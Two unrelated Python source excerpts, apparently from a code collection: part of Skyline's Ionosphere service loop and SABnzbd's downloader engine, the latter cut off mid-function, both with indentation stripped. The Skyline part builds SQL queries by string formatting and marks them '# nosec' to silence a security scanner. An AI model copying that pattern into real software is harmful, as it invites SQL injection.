# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# self.populate the database metatdata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
host_id = self.memcache_client.get(hosts_id_key)
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine populate %s into the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric has been added to add
"""
while True:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
while time() - p_starts <= 5:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
not_anomalous = str(len(self.not_anomalous))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
total_anomalies = str(len(self.anomalous_metrics))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
training_metrics = str(len(self.training_metrics))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
features_profiles_checked = str(len(self.features_profiles_checked))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(self.layers_checked))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
sent_to_panorama = str(len(self.sent_to_panorama))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s up' % cache_key)
# Reset lists
self.anomalous_metrics[:] = []
self.not_anomalous[:] = []
self.features_profiles_checked[:] = []
self.training_metrics[:] = []
self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
self.layers_checked[:] = []
ionosphere_job = False
learn_job = False
if metric_var_files:
ionosphere_job = True
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
learn_work = None
try:
learn_work = self.redis_conn.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
for metric_name in unique_metrics:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
for alert in settings.ALERTS:
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
if base_name not in self.ionosphere_smtp_alerter_metrics:
self.ionosphere_smtp_alerter_metrics.append(base_name)
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
if base_name not in self.ionosphere_smtp_alerter_metrics:
self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in self.ionosphere_smtp_alerter_metrics:
self.ionosphere_non_smtp_alerter_metrics.append(base_name)
logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
if ionosphere_job:
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis works sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile valid_learning_duration (e.g.
# 3361) later.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, ionosphere_processes + 1):
if ionosphere_job:
try:
p = Process(target=self.spin_process, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
# for to long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
while time() - p_starts <= 55:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(ionosphere_processes),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
for p in pids:
if p.is_alive():
logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
p.join()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Reset added lists of ionospehere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
self.ionosphere_smtp_alerter_metrics[:] = []
self.ionosphere_non_smtp_alerter_metrics[:] = []
|
downloader.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2021 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.downloader - download engine
"""
import time
import select
import logging
from math import ceil
from threading import Thread, RLock
from nntplib import NNTPPermanentError
import socket
import random
import sys
import ssl
from typing import List, Dict, Optional, Union
import sabnzbd
from sabnzbd.decorators import synchronized, NzbQueueLocker, DOWNLOADER_CV
from sabnzbd.newswrapper import NewsWrapper
import sabnzbd.notifier
import sabnzbd.config as config
import sabnzbd.cfg as cfg
from sabnzbd.misc import from_units, nntp_to_msg, int_conv, get_server_addrinfo
from sabnzbd.utils.happyeyeballs import happyeyeballs
# Timeout penalty in minutes for each cause
_PENALTY_UNKNOWN = 3 # Unknown cause
_PENALTY_502 = 5 # Unknown 502
_PENALTY_TIMEOUT = 10 # Server doesn't give an answer (multiple times)
_PENALTY_SHARE = 10 # Account sharing detected
_PENALTY_TOOMANY = 10 # Too many connections
_PENALTY_PERM = 10 # Permanent error, like bad username/password
_PENALTY_SHORT = 1 # Minimal penalty when no_penalties is set
_PENALTY_VERYSHORT = 0.1 # Error 400 without cause clues
# Wait this many seconds between checking idle servers for new articles or busy threads for timeout
_SERVER_CHECK_DELAY = 0.5
# Wait this many seconds between updates of the BPSMeter
_BPSMETER_UPDATE_DELAY = 0.05
TIMER_LOCK = RLock()
class Server:
# Pre-define attributes to save memory and improve get/set performance
__slots__ = (
"id",
"newid",
"restart",
"displayname",
"host",
"port",
"timeout",
"threads",
"priority",
"ssl",
"ssl_verify",
"ssl_ciphers",
"ssl_context",
"required",
"optional",
"retention",
"send_group",
"username",
"password",
"busy_threads",
"next_busy_threads_check",
"idle_threads",
"next_article_search",
"active",
"bad_cons",
"errormsg",
"warning",
"info",
"ssl_info",
"request",
"have_body",
"have_stat",
"article_queue",
)
def __init__(
self,
server_id,
displayname,
host,
port,
timeout,
threads,
priority,
use_ssl,
ssl_verify,
ssl_ciphers,
send_group,
username=None,
password=None,
required=False,
optional=False,
retention=0,
):
self.id: str = server_id
self.newid: Optional[str] = None
self.restart: bool = False
self.displayname: str = displayname
self.host: str = host
self.port: int = port
self.timeout: int = timeout
self.threads: int = threads
self.priority: int = priority
self.ssl: bool = use_ssl
self.ssl_verify: int = ssl_verify
self.ssl_ciphers: str = ssl_ciphers
self.ssl_context: Optional[ssl.SSLContext] = None
self.required: bool = required
self.optional: bool = optional
self.retention: int = retention
self.send_group: bool = send_group
self.username: Optional[str] = username
self.password: Optional[str] = password
self.busy_threads: List[NewsWrapper] = []
self.next_busy_threads_check: float = 0
self.idle_threads: List[NewsWrapper] = []
self.next_article_search: float = 0
self.active: bool = True
self.bad_cons: int = 0
self.errormsg: str = ""
self.warning: str = ""
self.info: Optional[List] = None # Will hold getaddrinfo() list
self.ssl_info: str = "" # Will hold the type and cipher of SSL connection
self.request: bool = False # True if a getaddrinfo() request is pending
self.have_body: bool = True # Assume server has "BODY", until proven otherwise
self.have_stat: bool = True # Assume server has "STAT", until proven otherwise
self.article_queue: List[sabnzbd.nzbstuff.Article] = []
# Initialize threads
for i in range(threads):
self.idle_threads.append(NewsWrapper(self, i + 1))
# Tell the BPSMeter about this server
sabnzbd.BPSMeter.init_server_stats(self.id)
@property
def hostip(self) -> str:
"""In case a server still has active connections, we use the same IP again
If new connection then based on value of load_balancing() and self.info:
0 - return the first entry, so all threads use the same IP
1 - and self.info has more than 1 entry (read: IP address): Return a random entry from the possible IPs
2 - and self.info has more than 1 entry (read: IP address): Return the quickest IP based on the happyeyeballs algorithm
In case of problems: return the host name itself
"""
# Check if already a successful ongoing connection
if self.busy_threads and self.busy_threads[0].nntp:
# Re-use that IP
logging.debug("%s: Re-using address %s", self.host, self.busy_threads[0].nntp.host)
return self.busy_threads[0].nntp.host
# Determine IP
ip = self.host
if self.info:
if cfg.load_balancing() == 0 or len(self.info) == 1:
# Just return the first one, so all next threads use the same IP
ip = self.info[0][4][0]
logging.debug("%s: Connecting to address %s", self.host, ip)
elif cfg.load_balancing() == 1:
# Return a random entry from the possible IPs
rnd = random.randint(0, len(self.info) - 1)
ip = self.info[rnd][4][0]
logging.debug("%s: Connecting to address %s", self.host, ip)
elif cfg.load_balancing() == 2:
# RFC6555 / Happy Eyeballs:
ip = happyeyeballs(self.host, port=self.port, use_ssl=self.ssl)
if ip:
logging.debug("%s: Connecting to address %s", self.host, ip)
else:
# nothing returned, so there was a connection problem
logging.debug("%s: No successful IP connection was possible", self.host)
return ip
def deactivate(self):
"""Deactive server and reset queued articles"""
self.active = False
self.reset_article_queue()
def stop(self):
"""Remove all connections from server"""
for nw in self.idle_threads:
sabnzbd.Downloader.remove_socket(nw)
nw.hard_reset(send_quit=True)
self.idle_threads = []
def request_info(self):
"""Launch async request to resolve server address.
getaddrinfo() can be very slow. In some situations this can lead
to delayed starts and timeouts on connections.
Because of this, the results will be cached in the server object."""
if not self.request:
self.request = True
Thread(target=self._request_info_internal).start()
def reset_article_queue(self):
logging.debug("Resetting article queue for %s", self)
for article in self.article_queue:
sabnzbd.NzbQueue.reset_try_lists(article, remove_fetcher_from_trylist=False)
self.article_queue = []
def _request_info_internal(self):
"""Async attempt to run getaddrinfo() for specified server"""
logging.debug("Retrieving server address information for %s", self.host)
self.info = get_server_addrinfo(self.host, self.port)
if not self.info:
self.bad_cons += self.threads
else:
self.bad_cons = 0
self.request = False
sabnzbd.Downloader.wakeup()
def __repr__(self):
return "<Server: %s:%s>" % (self.host, self.port)
class Downloader(Thread):
"""Singleton Downloader Thread"""
# Improves get/set performance, even though it's inherited from Thread
# Due to the huge number of get-calls in run(), it can actually make a difference
__slots__ = (
"paused",
"bandwidth_limit",
"bandwidth_perc",
"sleep_time",
"paused_for_postproc",
"shutdown",
"server_restarts",
"force_disconnect",
"read_fds",
"servers",
"timers",
)
def __init__(self, paused=False):
super().__init__()
logging.debug("Initializing downloader")
# Used for scheduled pausing
self.paused: bool = paused
# Used for reducing speed
self.bandwidth_limit: int = 0
self.bandwidth_perc: int = 0
cfg.bandwidth_perc.callback(self.speed_set)
cfg.bandwidth_max.callback(self.speed_set)
self.speed_set()
# Used to see if we can add a slowdown to the Downloader-loop
self.sleep_time: float = 0.0
self.sleep_time_set()
cfg.downloader_sleep_time.callback(self.sleep_time_set)
self.paused_for_postproc: bool = False
self.shutdown: bool = False
# A user might change server parms again before server restart is ready.
# Keep a counter to prevent multiple restarts
self.server_restarts: int = 0
self.force_disconnect: bool = False
self.read_fds: Dict[int, NewsWrapper] = {}
self.servers: List[Server] = []
self.timers: Dict[str, List[float]] = {}
for server in config.get_servers():
self.init_server(None, server)
def init_server(self, oldserver: Optional[str], newserver: str):
"""Setup or re-setup single server
When oldserver is defined and in use, delay startup.
Note that the server names are "host:port" strings!
"""
create = False
servers = config.get_servers()
if newserver in servers:
srv = servers[newserver]
enabled = srv.enable()
displayname = srv.displayname()
host = srv.host()
port = srv.port()
timeout = srv.timeout()
threads = srv.connections()
priority = srv.priority()
ssl = srv.ssl()
ssl_verify = srv.ssl_verify()
ssl_ciphers = srv.ssl_ciphers()
username = srv.username()
password = srv.password()
required = srv.required()
optional = srv.optional()
retention = int(srv.retention() * 24 * 3600) # days ==> seconds
send_group = srv.send_group()
create = True
if oldserver:
for server in self.servers:
if server.id == oldserver:
# Server exists, do re-init later
create = False
server.newid = newserver
server.restart = True
server.reset_article_queue()
self.server_restarts += 1
break
if create and enabled and host and port and threads:
self.servers.append(
Server(
newserver,
displayname,
host,
port,
timeout,
threads,
priority,
ssl,
ssl_verify,
ssl_ciphers,
send_group,
username,
password,
required,
optional,
retention,
)
)
# Sort the servers for performance
self.servers.sort(key=lambda svr: "%02d%s" % (svr.priority, svr.displayname.lower()))
def add_socket(self, fileno: int, nw: NewsWrapper):
"""Add a socket ready to be used to the list to be watched"""
self.read_fds[fileno] = nw
def remove_socket(self, nw: NewsWrapper):
"""Remove a socket to be watched"""
if nw.nntp:
self.read_fds.pop(nw.nntp.fileno, None)
@NzbQueueLocker
def set_paused_state(self, state: bool):
"""Set downloader to specified paused state"""
self.paused = state
@NzbQueueLocker
def resume(self):
# Do not notify when SABnzbd is still starting
if self.paused and sabnzbd.WEB_DIR:
logging.info("Resuming")
sabnzbd.notifier.send_notification("SABnzbd", T("Resuming"), "pause_resume")
self.paused = False
@NzbQueueLocker
def pause(self):
"""Pause the downloader, optionally saving admin"""
if not self.paused:
self.paused = True
logging.info("Pausing")
sabnzbd.notifier.send_notification("SABnzbd", T("Paused"), "pause_resume")
if self.is_paused():
sabnzbd.BPSMeter.reset()
if cfg.autodisconnect():
self.disconnect()
def wait_for_postproc(self):
logging.info("Waiting for post-processing to finish")
self.paused_for_postproc = True
@NzbQueueLocker
def resume_from_postproc(self):
logging.info("Post-processing finished, resuming download")
self.paused_for_postproc = False
@NzbQueueLocker
def disconnect(self):
logging.info("Forcing disconnect")
self.force_disconnect = True
def limit_speed(self, value: Union[str, int]):
"""Set the actual download speed in Bytes/sec
When 'value' ends with a '%' sign or is within 1-100, it is interpreted as a pecentage of the maximum bandwidth
When no '%' is found, it is interpreted as an absolute speed (including KMGT notation).
"""
if value:
mx = cfg.bandwidth_max.get_int()
if "%" in str(value) or (0 < from_units(value) < 101):
limit = value.strip(" %")
self.bandwidth_perc = from_units(limit)
if mx:
self.bandwidth_limit = mx * self.bandwidth_perc / 100
else:
logging.warning_helpful(T("You must set a maximum bandwidth before you can set a bandwidth limit"))
else:
self.bandwidth_limit = from_units(value)
if mx:
self.bandwidth_perc = self.bandwidth_limit / mx * 100
else:
self.bandwidth_perc = 100
else:
self.speed_set()
logging.info("Speed limit set to %s B/s", self.bandwidth_limit)
def get_limit(self):
return self.bandwidth_perc
def get_limit_abs(self):
return self.bandwidth_limit
def speed_set(self):
limit = cfg.bandwidth_max.get_int()
perc = cfg.bandwidth_perc()
if limit and perc:
self.bandwidth_perc = perc
self.bandwidth_limit = limit * perc / 100
else:
self.bandwidth_perc = 0
self.bandwidth_limit = 0
def sleep_time_set(self):
self.sleep_time = cfg.downloader_sleep_time() * 0.0001
logging.debug("Sleep time: %f seconds", self.sleep_time)
def is_paused(self):
if not self.paused:
return False
else:
if sabnzbd.NzbQueue.has_forced_items():
return False
else:
return True
def highest_server(self, me: Server):
"""Return True when this server has the highest priority of the active ones
0 is the highest priority
"""
for server in self.servers:
if server is not me and server.active and server.priority < me.priority:
return False
return True
def nzo_servers(self, nzo):
return list(filter(nzo.server_in_try_list, self.servers))
def maybe_block_server(self, server: Server):
# Was it resolving problem?
if server.info is False:
# Warn about resolving issues
errormsg = T("Cannot connect to server %s [%s]") % (server.host, T("Server name does not resolve"))
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(errormsg)
if not server.required:
logging.warning(T("Server %s will be ignored for %s minutes"), server.host, _PENALTY_TIMEOUT)
# Not fully the same as the code below for optional servers
server.bad_cons = 0
if server.required:
sabnzbd.Scheduler.plan_required_server_resume()
else:
server.deactivate()
self.plan_server(server, _PENALTY_TIMEOUT)
# Optional and active server had too many problems.
# Disable it now and send a re-enable plan to the scheduler
if server.optional and server.active and (server.bad_cons / server.threads) > 3:
# Deactivate server
server.bad_cons = 0
server.deactivate()
logging.warning(T("Server %s will be ignored for %s minutes"), server.host, _PENALTY_TIMEOUT)
self.plan_server(server, _PENALTY_TIMEOUT)
# Remove all connections to server
for nw in server.idle_threads + server.busy_threads:
self.__reset_nw(nw, "forcing disconnect", warn=False, wait=False, retry_article=False, send_quit=False)
# Make sure server address resolution is refreshed
server.info = None
def decode(self, article, raw_data: Optional[List[bytes]]):
"""Decode article and check the status of
the decoder and the assembler
"""
# Article was requested and fetched, update article stats for the server
sabnzbd.BPSMeter.register_server_article_tried(article.fetcher.id)
# Handle broken articles directly
if not raw_data:
if not article.search_new_server():
sabnzbd.NzbQueue.register_article(article, success=False)
article.nzf.nzo.increase_bad_articles_counter("missing_articles")
return
# Send to decoder-queue
sabnzbd.Decoder.process(article, raw_data)
# See if we need to delay because the queues are full
logged = False
while not self.shutdown and (sabnzbd.Decoder.queue_full() or sabnzbd.Assembler.queue_full()):
if not logged:
# Only log once, to not waste any CPU-cycles
logging.debug(
"Delaying - Decoder queue: %s - Assembler queue: %s",
sabnzbd.Decoder.decoder_queue.qsize(),
sabnzbd.Assembler.queue.qsize(),
)
logged = True
time.sleep(0.01)
def run(self):
# First check IPv6 connectivity
sabnzbd.EXTERNAL_IPV6 = sabnzbd.test_ipv6()
logging.debug("External IPv6 test result: %s", sabnzbd.EXTERNAL_IPV6)
# Then we check SSL certificate checking
sabnzbd.CERTIFICATE_VALIDATION = sabnzbd.test_cert_checking()
logging.debug("SSL verification test: %s", sabnzbd.CERTIFICATE_VALIDATION)
# Kick BPS-Meter to check quota
BPSMeter = sabnzbd.BPSMeter
BPSMeter.update()
next_bpsmeter_update = 0
# can_be_slowed variables
can_be_slowed: Optional[float] = None
can_be_slowed_timer: float = 0.0
next_stable_speed_check: float = 0.0
# Check server expiration dates
check_server_expiration()
while 1:
now = time.time()
# Set Article to None so references from this
# thread do not keep the parent objects alive (see #1628)
article = None
for server in self.servers:
# Skip this server if there's no point searching for new stuff to do
if not server.busy_threads and server.next_article_search > now:
continue
if server.next_busy_threads_check < now:
server.next_busy_threads_check = now + _SERVER_CHECK_DELAY
for nw in server.busy_threads[:]:
if (nw.nntp and nw.nntp.error_msg) or (nw.timeout and now > nw.timeout):
if nw.nntp and nw.nntp.error_msg:
# Already showed error
self.__reset_nw(nw)
else:
self.__reset_nw(nw, "timed out", warn=True)
server.bad_cons += 1
self.maybe_block_server(server)
if server.restart:
if not server.busy_threads:
newid = server.newid
server.stop()
self.servers.remove(server)
if newid:
self.init_server(None, newid)
self.server_restarts -= 1
# Have to leave this loop, because we removed element
break
else:
# Restart pending, don't add new articles
continue
if (
not server.idle_threads
or self.is_paused()
or self.shutdown
or self.paused_for_postproc
or not server.active
):
continue
for nw in server.idle_threads[:]:
if nw.timeout:
if now < nw.timeout:
continue
else:
nw.timeout = None
if not server.info:
# Only request info if there's stuff in the queue
if not sabnzbd.NzbQueue.is_empty():
self.maybe_block_server(server)
server.request_info()
break
# Get article from pre-fetched ones or fetch new ones
if server.article_queue:
article = server.article_queue.pop(0)
else:
# Pre-fetch new articles
server.article_queue = sabnzbd.NzbQueue.get_articles(
server, self.servers, max(1, server.threads // 4)
)
if server.article_queue:
article = server.article_queue.pop(0)
# Mark expired articles as tried on this server
if server.retention and article.nzf.nzo.avg_stamp < now - server.retention:
self.decode(article, None)
while server.article_queue:
self.decode(server.article_queue.pop(), None)
# Move to the next server, allowing the next server to already start
# fetching the articles that were too old for this server
break
else:
# Skip this server for a short time
server.next_article_search = now + _SERVER_CHECK_DELAY
break
server.idle_threads.remove(nw)
server.busy_threads.append(nw)
nw.article = article
if nw.connected:
self.__request_article(nw)
else:
try:
logging.info("%s@%s: Initiating connection", nw.thrdnum, server.host)
nw.init_connect()
except:
logging.error(
T("Failed to initialize %s@%s with reason: %s"),
nw.thrdnum,
server.host,
sys.exc_info()[1],
)
self.__reset_nw(nw, "failed to initialize", warn=True)
if self.force_disconnect or self.shutdown:
for server in self.servers:
for nw in server.idle_threads + server.busy_threads:
# Send goodbye if we have open socket
if nw.nntp:
self.__reset_nw(
nw, "forcing disconnect", wait=False, count_article_try=False, send_quit=True
)
# Make sure server address resolution is refreshed
server.info = None
server.reset_article_queue()
self.force_disconnect = False
# Make sure we update the stats
BPSMeter.update()
# Exit-point
if self.shutdown:
logging.info("Shutting down")
break
# Use select to find sockets ready for reading/writing
readkeys = self.read_fds.keys()
if readkeys:
read, _, _ = select.select(readkeys, (), (), 1.0)
# Add a sleep if there are too few results compared to the number of active connections
if self.sleep_time:
if can_be_slowed and len(read) < 1 + len(readkeys) / 10:
time.sleep(self.sleep_time)
# Initialize by waiting for stable speed and then enable sleep
if can_be_slowed is None or can_be_slowed_timer:
# Wait for stable speed to start testing
if not can_be_slowed_timer and now > next_stable_speed_check:
if BPSMeter.get_stable_speed(timespan=10):
can_be_slowed_timer = now + 8
can_be_slowed = 1
else:
next_stable_speed_check = now + _BPSMETER_UPDATE_DELAY
# Check 10 seconds after enabling slowdown
if can_be_slowed_timer and now > can_be_slowed_timer:
